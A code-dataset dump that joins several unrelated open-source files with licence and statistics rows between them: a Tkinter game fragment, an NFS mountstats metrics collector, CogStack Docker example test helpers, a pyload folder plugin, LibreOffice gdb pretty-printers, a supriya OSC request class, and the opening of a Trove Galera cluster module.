# Create dictionaries to store all the forms and widget classes. It's easier to pass a whole dict than it is to pass each individual form.
# Cleaner too.
forms = {}
apps = {}
forms["root"] = Tkinter.Tk() # Create a new window and assign it to the entry 'root' in the dict.
apps["game"] = GameMain(forms, apps) # Create an object based on the GameMain class, which will create all the needed widgets and variables.
forms["root"].mainloop() # Commence the event-loop.
def binary_entry(forms, apps):
forms["binary"] = Tkinter.Tk()
apps["binary"] = EnterBinary(forms, apps)
forms["binary"].mainloop()
def scorecard(forms, apps):
forms["scorecard"] = Tkinter.Tk()
apps["scorecard"] = FinalScore(forms, apps)
forms["scorecard"].mainloop()
|
gpl-2.0
| -3,188,199,944,839,545,000
| 45.57561
| 159
| 0.700566
| false
| 3.357243
| false
| false
| false
|
ApptuitAI/xcollector
|
collectors/0/mountstats.py
|
1
|
11150
|
#!/usr/bin/env python
# This file is part of tcollector.
# Copyright (C) 2013 The tcollector Authors.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty
# of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser
# General Public License for more details. You should have received a copy
# of the GNU Lesser General Public License along with this program. If not,
# see <http://www.gnu.org/licenses/>.
#
"""mountstats.py Tcollector
#
# This script pull NFS mountstats data, dedupes it by mount point and puts it into the following namespaces:
#
# proc.mountstats.<rpccall>.<metric> nfshost=<nfsserver> nfsvol=<nfsvolume>
# # Note that if subdirectories of nfsvol are mounted, but the 'events' line of /proc/self/mountstats is
# identical, then the metrics will be deduped, and the first alphabetic volume name will be used
# proc.mountstats.bytes.<metric> 1464196613 41494104 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# # Taken from the 'bytes:' line in /proc/self/mountstats
# # each <metric> represents one field on the line
#
# See https://utcc.utoronto.ca/~cks/space/blog/linux/NFSMountstatsIndex
# and https://utcc.utoronto.ca/~cks/space/blog/linux/NFSMountstatsNFSOps
# for a great example of the data available in /proc/self/mountstats
#
# Example output:
# proc.mountstats.getattr.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.getattr.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.access.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.read.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.write.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.totaltime 1464196613 2670792 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.ops 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.timeouts 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.qtime 1464196613 14216 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.txbytes 1464196613 244313360 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.rttime 1464196613 1683992 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.rxbytes 1464196613 263929348 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.other.txs 1464196613 1570976 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.normalread 1464196613 41494104 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.normalwrite 1464196613 10145341022 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.directread 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.directwrite 1464196613 0 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.serverread 1464196613 8413526 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.serverwrite 1464196613 10145494716 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.readpages 1464196613 2157 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
# proc.mountstats.bytes.writepages 1464196613 2477054 nfshost=fls1.sys.lab1.syseng.tmcs nfsvol=/vol/vol0
"""
import sys
import time
import hashlib
COLLECTION_INTERVAL = 10 # seconds
# BYTES_FIELDS lists the individual fields on the 'bytes:' line
BYTES_FIELDS = ['normalread', 'normalwrite', 'directread', 'directwrite', 'serverread', 'serverwrite', 'readpages',
'writepages']
# KEY_METRICS contains the RPC call metrics we want specific data for
KEY_METRICS = ['GETATTR', 'ACCESS', 'READ', 'WRITE']
# OTHER_METRICS contains the other RPC calls we will aggregate as 'other'
OTHER_METRICS = ['SETATTR', 'LOOKUP', 'READLINK', 'CREATE', 'MKDIR', 'SYMLINK', 'MKNOD', 'REMOVE', 'RMDIR', 'RENAME',
'LINK', 'READDIR', 'READDIRPLUS', 'FSSTAT', 'FSINFO', 'PATHCONF', 'COMMIT']
# RPC_FIELDS is the individual metric fields on the RPC metric lines
RPC_FIELDS = ['ops', 'txs', 'timeouts', 'txbytes', 'rxbytes', 'qtime', 'rttime', 'totaltime']
def main():
"""nfsstats main loop."""
try:
f_nfsstats = open("/proc/self/mountstats", "r")
    except IOError:
        sys.exit(13)
while True:
device = None
f_nfsstats.seek(0)
ts = int(time.time())
rpc_metrics = {}
for line in f_nfsstats:
values = line.split(None)
if len(values) == 0:
continue
if len(values) >= 8 and values[0] == 'device':
if values[7] == 'nfs':
dupe = False
hostname, mount = values[1].split(':')
mountpoint = values[4]
mount = mount.rstrip("/")
device = hostname + mount + mountpoint
rpc_metrics[device] = {}
rpc_metrics[device]['other'] = dict((x, 0) for x in RPC_FIELDS)
rpc_metrics[device]['nfshost'] = hostname
rpc_metrics[device]['nfsvol'] = mount
rpc_metrics[device]['mounts'] = [mount]
for metric in KEY_METRICS:
rpc_metrics[device][metric] = dict((x, 0) for x in RPC_FIELDS)
            if device is None:
                continue
            if dupe:
                continue
field = values[0].rstrip(":")
# Use events as a deduping key for multiple mounts of the same volume
# ( If multiple subdirectories of the same volume are mounted to different places they
# will show up in mountstats, but will have duplicate data. )
if field == "events":
digester = hashlib.md5()
digester.update(line)
m = digester.digest()
rpc_metrics[device]['digest'] = m
if m in rpc_metrics:
                    # metrics already counted for this volume; mark this mount as a dupe and skip it
dupe = True
first_device = rpc_metrics[m]
rpc_metrics[first_device]['mounts'].append(mount)
rpc_metrics[device]['dupe'] = True
else:
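                    # remember which device first produced this digest so later
                    # duplicate mounts can append themselves to its entry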
rpc_metrics[m] = device
if field == "bytes":
rpc_metrics[device]['bytes'] = dict(
(BYTES_FIELDS[i], values[i + 1]) for i in range(0, len(BYTES_FIELDS)))
if field in KEY_METRICS:
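                # values[1:] are the per-op counters, in RPC_FIELDS order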
for i in range(1, len(RPC_FIELDS) + 1):
metric = field
rpc_metrics[device][metric][RPC_FIELDS[i - 1]] += int(values[i])
if field in OTHER_METRICS:
for i in range(1, len(RPC_FIELDS) + 1):
rpc_metrics[device]['other'][RPC_FIELDS[i - 1]] += int(values[i])
for device in rpc_metrics:
# Skip the duplicates
if 'dupe' in rpc_metrics[device]:
continue
            # Skip the digest-only reverse-map entries (they won't have a reference to the digest)
if 'digest' not in rpc_metrics[device]:
continue
nfshost = rpc_metrics[device]['nfshost']
rpc_metrics[device]['mounts'].sort()
nfsvol = rpc_metrics[device]['mounts'][0]
for metric in KEY_METRICS + ['other']:
for field in rpc_metrics[device][metric]:
print("proc.mountstats.%s.%s %d %s nfshost=%s nfsvol=%s" % (metric.lower(), field.lower(), ts, rpc_metrics[device][metric][field], nfshost, nfsvol))
for field in BYTES_FIELDS:
print("proc.mountstats.bytes.%s %d %s nfshost=%s nfsvol=%s" % (field.lower(), ts, rpc_metrics[device]['bytes'][field], nfshost, nfsvol))
sys.stdout.flush()
time.sleep(COLLECTION_INTERVAL)
if __name__ == "__main__":
main()
|
lgpl-3.0
| -7,301,741,734,256,473,000
| 57.376963
| 168
| 0.688969
| false
| 3.017591
| false
| false
| false
|
CogStack/cogstack
|
test/examples/examples_common.py
|
1
|
13905
|
#!/usr/bin/python
import unittest
import os
import logging
import subprocess
import time
import yaml
from connectors import *
class TestSingleExample(unittest.TestCase):
"""
A common base class for the examples test cases
"""
def __init__(self,
example_path,
sub_case="",
use_local_image_build=True,
image_build_rel_dir="../../../",
*args, **kwargs):
"""
:param example_path: the absolute patch to the examples main directory
:param sub_case: the specific sub case to test
:param use_local_image_build: whether to use a locally build CogStack Pipeline image
:param image_build_rel_dir: the relative directory where the image Dockerfile is located
:param args: any additional arguments passed on to the parent class
:param kwargs: any additional arguments passed on to the parent class
"""
super(TestSingleExample, self).__init__(*args, **kwargs)
# set paths and directories info
self.example_path = example_path
self.sub_case = sub_case
self.deploy_dir = '__deploy'
self.use_local_image_build = use_local_image_build
self.image_build_rel_dir = image_build_rel_dir
self.deploy_path = os.path.join(self.example_path, self.deploy_dir)
if len(self.sub_case) > 0:
self.deploy_path = os.path.join(self.deploy_path, self.sub_case)
self.image_build_rel_dir += "../"
# set commands
self.setup_cmd = 'bash setup.sh'
self.docker_cmd_up = 'docker-compose up -d' # --detach
self.docker_cmd_down = 'docker-compose down -v' # --volumes
# set up logger
log_format = '[%(asctime)s] [%(levelname)s] %(name)s: %(message)s'
logging.basicConfig(format=log_format, level=logging.INFO)
self.log = logging.getLogger(self.__class__.__name__)
@staticmethod
def getRecordsCountFromTargetDb(connector, table_name):
"""
Queries the table for the number of records
in the database specified by the connector
:param connector: the database connector :class:~JdbcConnector
:param table_name: the name of the table to query
:return: the number of records
"""
cursor = connector.cursor()
cursor.execute("SELECT COUNT(*) FROM %s" % table_name)
res = cursor.fetchall()
# res is a list of tuples
return int(res[0][0])
@staticmethod
def getRecordsCountFromTargetEs(connector, index_name):
"""
Queries the index for the number of documents (_count)
:param connector: the ElasticSearch connector :class:~ElasticSearchConnector
:param index_name: the name of the index to query
:return: the number of records
"""
res = connector.count(index_name)
return int(res['count'])
@staticmethod
def waitForTargetEsReady(connector, index_name, max_timeout_s=300):
"""
Queries the index for the number of documents until no new arrive
:param connector: the ElasticSearch connector :class:~ElasticSearchConnector
:param index_name: the name of the index to query
:param max_timeout_s: maximum timeout [in s]
"""
start_time_s = time.time()
query_delay_s = 3
# wait for index
while True:
try:
index_exists = connector.indices.exists(index=index_name)
if index_exists or int(time.time() - start_time_s) > max_timeout_s:
break
except Exception as e:
                logging.warning('Exception while querying index: %s' % e)
time.sleep(query_delay_s)
min_count_wo_changes = 3
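        # the sink counts as ready once the document count is unchanged for
        # min_count_wo_changes consecutive polls (or the timeout expires)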
cur_count_wo_changes = 0
last_records_count = 0
# wait for documents
while cur_count_wo_changes < min_count_wo_changes:
recs = TestSingleExample.getRecordsCountFromTargetEs(connector, index_name)
if recs > 0:
if recs == last_records_count:
cur_count_wo_changes += 1
else:
last_records_count = recs
cur_count_wo_changes = 0
            if cur_count_wo_changes >= min_count_wo_changes or int(time.time() - start_time_s) > max_timeout_s:
break
time.sleep(query_delay_s)
@staticmethod
def waitForTargetDbReady(connector, table_name, max_timeout_s=300):
"""
Queries the table for the number of records until no new arrive
:param connector: the JDBC connector :class:~JdbcConnector
:param table_name: the name of the table to query
:param max_timeout_s: maximum timeout [in s]
"""
start_time_s = time.time()
query_delay_s = 3
min_count_wo_changes = 3
cur_count_wo_changes = 0
last_records_count = 0
# wait for records
while cur_count_wo_changes < min_count_wo_changes:
recs = TestSingleExample.getRecordsCountFromTargetDb(connector, table_name)
if recs > 0:
if recs == last_records_count:
cur_count_wo_changes += 1
else:
last_records_count = recs
cur_count_wo_changes = 0
            if cur_count_wo_changes >= min_count_wo_changes or int(time.time() - start_time_s) > max_timeout_s:
break
time.sleep(query_delay_s)
def addBuildContextInComposeFile(self):
"""
Add the build context key in the Docker Compose file
to be using a locally build image
"""
compose_file = os.path.join(self.deploy_path, "docker-compose.override.yml")
with open(compose_file, 'r') as c_file:
compose_yaml = yaml.safe_load(c_file)
# check whether the service key exists and add the build context
if 'cogstack-pipeline' not in compose_yaml['services']:
compose_yaml['services']['cogstack-pipeline'] = dict()
compose_yaml['services']['cogstack-pipeline']['build'] = self.image_build_rel_dir
# save the file in-place
with open(compose_file, 'w') as c_file:
yaml.dump(compose_yaml, c_file, default_flow_style=False)
def setUp(self):
"""
Runs test case set up function
"""
# run setup for the example
self.log.info("Setting up ...")
try:
out = subprocess.check_output(self.setup_cmd, cwd=self.example_path, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
self.log.error("Failed to setup example: %s" % e)
if hasattr(e, 'output'):
self.log.error("Output: %s" % e.output)
            self.fail(str(e))
# replace the image to local build
if self.use_local_image_build:
try:
self.addBuildContextInComposeFile()
except Exception as e:
self.log.error("Failed to add the local build context: %s" % e)
                self.fail(str(e))
# run docker-compose
self.log.info("Starting the services ...")
try:
out = subprocess.check_output(self.docker_cmd_up, cwd=self.deploy_path, stderr=subprocess.STDOUT, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
# clean up
try:
out = subprocess.check_output(self.docker_cmd_down, stderr=subprocess.STDOUT, cwd=self.deploy_path, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as ee:
self.log.warn("Failed to stop services: %s" % ee)
self.log.error("Failed to start services: %s" % e)
            self.fail(str(e))
def tearDown(self):
""""
Runs test case tear down function
"""
# run docker-compose
self.log.info("Stopping the services ...")
try:
out = subprocess.check_output(self.docker_cmd_down, cwd=self.deploy_path, stderr=subprocess.STDOUT, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
self.log.warn("Failed to stop services: %s " % e)
# clean up the directory
self.log.info("Cleaning up ...")
main_deploy_path = os.path.join(self.example_path, self.deploy_dir)
try:
out = subprocess.check_output('rm -rf %s' % main_deploy_path, shell=True)
if len(out) > 0:
self.log.debug(out)
except Exception as e:
self.log.warn("Failed to clean up: %s" % e)
class TestSingleExampleDb2Es(TestSingleExample):
"""
A common base class for examples reading the records from a single database source
and storing them in ElasticSearch sink
"""
def __init__(self, source_conn_conf, source_table_name, es_conn_conf, es_index_name,
wait_for_source_ready_s=10,
wait_for_sink_ready_max_s=600,
*args, **kwargs):
"""
:param source_conn_conf: the source JDBC connector configuration :class:~JdbcConnectorConfig
:param source_table_name: the source database table name
:param es_conn_conf: the sink ElasticSearch connector configuration :class:~ElasticConnectorConfig
:param es_index_name: the sink ElasticSearch index name
:param wait_for_source_ready_s: delay [in s] to wait until source is ready to query
        :param wait_for_sink_ready_max_s: maximum time [in s] to wait until the sink (and data) becomes ready to query
:param args: any additional arguments passed on to the parent class
:param kwargs: any additional arguments passed on to the parent class
"""
super(TestSingleExampleDb2Es, self).__init__(*args, **kwargs)
self.source_conn_conf = source_conn_conf
self.source_table_name = source_table_name
self.es_conn_conf = es_conn_conf
self.es_index_name = es_index_name
        self.wait_for_source_ready_s = wait_for_source_ready_s
self.wait_for_sink_ready_max_s = wait_for_sink_ready_max_s
def test_source_sink_mapping(self):
""""
Runs a simple test verifying the number of records in the source and the sink
"""
# wait here until DBs become ready
self.log.info("Waiting for source/sink to become ready ...")
        time.sleep(self.wait_for_source_ready_s)
source_conn = JdbcConnector(self.source_conn_conf)
es_conn = ElasticConnector(self.es_conn_conf)
# wait here until ES becomes ready
self.log.info("Waiting for cogstack pipeline to process records ...")
#time.sleep(self.wait_for_sink_ready_max_s)
self.waitForTargetEsReady(es_conn.connector, self.es_index_name, self.wait_for_sink_ready_max_s)
recs_in = self.getRecordsCountFromTargetDb(source_conn.connector, self.source_table_name)
recs_out = self.getRecordsCountFromTargetEs(es_conn.connector, self.es_index_name)
self.assertEqual(recs_in, recs_out, "Records counts differ between source (%s) and sink (%s)." % (recs_in, recs_out))
class TestSingleExampleDb2Db(TestSingleExample):
"""
A common base class for examples reading the records from a single database source
and storing them in the same or another database sink
"""
def __init__(self, source_conn_conf, source_table_name, sink_conn_conf, sink_table_name,
wait_for_source_ready_s=10,
wait_for_sink_ready_max_s=600,
*args, **kwargs):
"""
:param source_conn_conf: the source JDBC connector configuration :class:~JdbcConnectorConfig
:param source_table_name: the source database table name
:param sink_conn_conf: the sink JDBC connector configuration :class:~JdbcConnectorConfig
:param sink_table_name: the sink database table name
:param wait_for_source_ready_s: delay [in s] to wait until source is ready to query
        :param wait_for_sink_ready_max_s: maximum time [in s] to wait until the sink (and data) becomes ready to query
:param args: any additional arguments passed on to the parent class
:param kwargs: any additional arguments passed on to the parent class
"""
super(TestSingleExampleDb2Db, self).__init__(*args, **kwargs)
self.source_conn_conf = source_conn_conf
self.source_table_name = source_table_name
self.sink_conn_conf = sink_conn_conf
self.sink_table_name = sink_table_name
        self.wait_for_source_ready_s = wait_for_source_ready_s
self.wait_for_sink_ready_max_s = wait_for_sink_ready_max_s
def test_source_sink_mapping(self):
""""
Runs a simple test verifying the number of records in the source and the sink
"""
# wait here until DBs become ready
self.log.info("Waiting for source/sink to become ready ...")
        time.sleep(self.wait_for_source_ready_s)
source_conn = JdbcConnector(self.source_conn_conf)
sink_conn = JdbcConnector(self.sink_conn_conf)
# wait here until sink becomes ready
self.log.info("Waiting for cogstack pipeline to process records ...")
self.waitForTargetDbReady(sink_conn.connector, self.sink_table_name, self.wait_for_sink_ready_max_s)
recs_in = self.getRecordsCountFromTargetDb(source_conn.connector, self.source_table_name)
recs_out = self.getRecordsCountFromTargetDb(sink_conn.connector, self.sink_table_name)
self.assertEqual(recs_in, recs_out, "Records counts differ between source (%s) and sink (%s)." % (recs_in, recs_out))
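# --- Usage sketch (illustrative only, not part of the original module) -------
# A hypothetical concrete test case wired up with the helpers above; the
# connector configs, paths and table/index names below are assumptions:
#
#   class TestMyDb2EsExample(TestSingleExampleDb2Es):
#       def __init__(self, *args, **kwargs):
#           super(TestMyDb2EsExample, self).__init__(
#               source_conn_conf=source_conf,    # a JdbcConnectorConfig
#               source_table_name='medical_reports',
#               es_conn_conf=es_conf,            # an ElasticConnectorConfig
#               es_index_name='sample_observations',
#               example_path='/examples/example1',
#               *args, **kwargs)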
|
apache-2.0
| 2,910,151,856,740,945,400
| 40.88253
| 127
| 0.611363
| false
| 3.916901
| true
| false
| false
|
rlindner81/pyload
|
module/plugins/crypter/FreakhareComFolder.py
|
1
|
1784
|
# -*- coding: utf-8 -*-
import re
from module.plugins.internal.SimpleCrypter import SimpleCrypter
class FreakhareComFolder(SimpleCrypter):
__name__ = "FreakhareComFolder"
__type__ = "crypter"
__version__ = "0.08"
__status__ = "testing"
__pattern__ = r'http://(?:www\.)?freakshare\.com/folder/.+'
__config__ = [("activated", "bool", "Activated", True),
("use_premium", "bool", "Use premium account if available", True),
("folder_per_package", "Default;Yes;No",
"Create folder for each package", "Default"),
("max_wait", "int", "Reconnect if waiting time is greater than minutes", 10)]
__description__ = """Freakhare.com folder decrypter plugin"""
__license__ = "GPLv3"
__authors__ = [("stickell", "l.stickell@yahoo.it")]
LINK_PATTERN = r'<a href="(http://freakshare\.com/files/.+?)" target="_blank">'
NAME_PATTERN = r'Folder:</b> (?P<N>.+)'
PAGES_PATTERN = r'Pages: +(\d+)'
def load_page(self, page_n):
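        # the folder's id/md5 pair is scraped once from the first page and
        # cached on the instance for subsequent page requests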
if not hasattr(self, 'f_id') and not hasattr(self, 'f_md5'):
m = re.search(
r'http://freakshare.com/\?x=folder&f_id=(\d+)&f_md5=(\w+)',
self.data)
if m is not None:
self.f_id = m.group(1)
self.f_md5 = m.group(2)
return self.load('http://freakshare.com/', get={'x': 'folder',
'f_id': self.f_id,
'f_md5': self.f_md5,
'entrys': '20',
'page': page_n - 1,
'order': ''})
|
gpl-3.0
| 5,220,101,632,335,312,000
| 41.47619
| 95
| 0.453475
| false
| 3.693582
| false
| false
| false
|
beppec56/core
|
solenv/gdb/libreoffice/writerfilter.py
|
5
|
2749
|
# -*- tab-width: 4; indent-tabs-mode: nil; py-indent-offset: 4 -*-
#
# This file is part of the LibreOffice project.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
from libreoffice.util import printing
class OOXMLPropertySetPrinter(object):
'''Prints writerfilter::ooxml::OOXMLPropertySet'''
def __init__(self, typename, value):
self.typename = typename
self.value = value
def to_string(self):
return "%s" % (self.typename)
def children(self):
children = [ ( 'properties', self.value['mProperties'] ) ]
        return iter(children)
class OOXMLPropertyPrinter(object):
'''Prints writerfilter::ooxml::OOXMLProperty'''
def __init__(self, typename, value):
self.typename = typename
self.value = value
def to_string(self):
return "%s" % (self.typename)
def children(self):
children = [ ( 'id', self.value['mId'] ),
( 'type', self.value['meType'] ),
( 'value', self.value['mpValue'] ) ]
        return iter(children)
class OOXMLPropertySetValuePrinter(object):
'''Prints writerfilter::ooxml::OOXMLPropertySetValue'''
def __init__(self, typename, value):
self.typename = typename
self.value = value
def to_string(self):
return "%s" % (self.typename)
class OOXMLStringValuePrinter(object):
'''Prints writerfilter::ooxml::OOXMLStringValue'''
def __init__(self, typename, value):
self.value = value
def to_string(self):
return "%s" % (self.value['mStr'])
class OOXMLIntegerValuePrinter(object):
'''Prints writerfilter::ooxml::OOXMLIntegerValue'''
def __init__(self, typename, value):
self.value = value
def to_string(self):
return "%d" % (self.value['mnValue'])
printer = None
def build_pretty_printers():
global printer
printer = printing.Printer("libreoffice/writerfilter")
printer.add('writerfilter::ooxml::OOXMLProperty', OOXMLPropertyPrinter)
printer.add('writerfilter::ooxml::OOXMLPropertySet', OOXMLPropertySetPrinter)
printer.add('writerfilter::ooxml::OOXMLPropertySetValue', OOXMLPropertySetValuePrinter)
printer.add('writerfilter::ooxml::OOXMLStringValue', OOXMLStringValuePrinter)
printer.add('writerfilter::ooxml::OOXMLIntegerValue', OOXMLIntegerValuePrinter)
printer.add('writerfilter::ooxml::OOXMLHexValue', OOXMLIntegerValuePrinter)
def register_pretty_printers(obj):
printing.register_pretty_printer(printer, obj)
build_pretty_printers()
# vim:set shiftwidth=4 softtabstop=4 expandtab:
|
gpl-3.0
| 8,452,466,231,903,170,000
| 30.238636
| 91
| 0.666788
| false
| 3.740136
| false
| false
| false
|
Pulgama/supriya
|
supriya/commands/SynthDefLoadDirectoryRequest.py
|
1
|
1591
|
import pathlib
import supriya.osc
from supriya.commands.Request import Request
from supriya.commands.RequestBundle import RequestBundle
from supriya.enums import RequestId
class SynthDefLoadDirectoryRequest(Request):
"""
A /d_loadDir request.
"""
### CLASS VARIABLES ###
__slots__ = ("_callback", "_directory_path")
request_id = RequestId.SYNTHDEF_LOAD_DIR
### INITIALIZER ###
def __init__(self, callback=None, directory_path=None):
Request.__init__(self)
if callback is not None:
assert isinstance(callback, (Request, RequestBundle))
self._callback = callback
self._directory_path = pathlib.Path(directory_path).absolute()
### PUBLIC METHODS ###
def to_osc(self, *, with_placeholders=False, with_request_name=False):
if with_request_name:
request_id = self.request_name
else:
request_id = int(self.request_id)
contents = [request_id, str(self.directory_path)]
if self.callback:
contents.append(
self.callback.to_osc(
with_placeholders=with_placeholders,
with_request_name=with_request_name,
)
)
message = supriya.osc.OscMessage(*contents)
return message
### PUBLIC PROPERTIES ###
@property
def callback(self):
return self._callback
@property
def response_patterns(self):
return ["/done", "/d_loadDir"], None
@property
def directory_path(self):
return self._directory_path
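# Usage sketch (hypothetical directory path; the resulting message shape is
# read off to_osc() above):
#
#     request = SynthDefLoadDirectoryRequest(directory_path='synthdefs/')
#     request.to_osc()
#     # -> OscMessage(int(RequestId.SYNTHDEF_LOAD_DIR), '/abs/path/synthdefs')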
|
mit
| 4,937,795,839,363,454,000
| 25.966102
| 74
| 0.607165
| false
| 4.154047
| false
| false
| false
|
openstack/trove
|
trove/common/strategies/cluster/experimental/galera_common/api.py
|
1
|
8545
|
# Copyright [2015] Hewlett-Packard Development Company, L.P.
# Copyright 2016 Tesora Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from oslo_log import log as logging
from trove.cluster import models as cluster_models
from trove.cluster.tasks import ClusterTasks
from trove.cluster.views import ClusterView
from trove.common import cfg
from trove.common import exception
from trove.common import server_group as srv_grp
from trove.common.strategies.cluster import base as cluster_base
from trove.extensions.mgmt.clusters.views import MgmtClusterView
from trove.instance.models import DBInstance
from trove.instance.models import Instance
from trove.quota.quota import check_quotas
from trove.taskmanager import api as task_api
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class GaleraCommonAPIStrategy(cluster_base.BaseAPIStrategy):
@property
def cluster_class(self):
return GaleraCommonCluster
@property
def cluster_view_class(self):
return GaleraCommonClusterView
@property
def mgmt_cluster_view_class(self):
return GaleraCommonMgmtClusterView
class GaleraCommonCluster(cluster_models.Cluster):
@staticmethod
def _validate_cluster_instances(context, instances, datastore,
datastore_version):
"""Validate the flavor and volume"""
ds_conf = CONF.get(datastore_version.manager)
num_instances = len(instances)
# Checking volumes and get delta for quota check
cluster_models.validate_instance_flavors(
context, instances, ds_conf.volume_support, ds_conf.device_path)
req_volume_size = cluster_models.get_required_volume_size(
instances, ds_conf.volume_support)
cluster_models.assert_homogeneous_cluster(instances)
deltas = {'instances': num_instances, 'volumes': req_volume_size}
# quota check
check_quotas(context.project_id, deltas)
# Checking networks are same for the cluster
cluster_models.validate_instance_nics(context, instances)
@staticmethod
def _create_instances(context, db_info, datastore, datastore_version,
instances, extended_properties, locality,
configuration_id):
member_config = {"id": db_info.id,
"instance_type": "member"}
name_index = int(time.time())
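        # seed member names with the current epoch so auto-generated names
        # stay unique across create/grow calls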
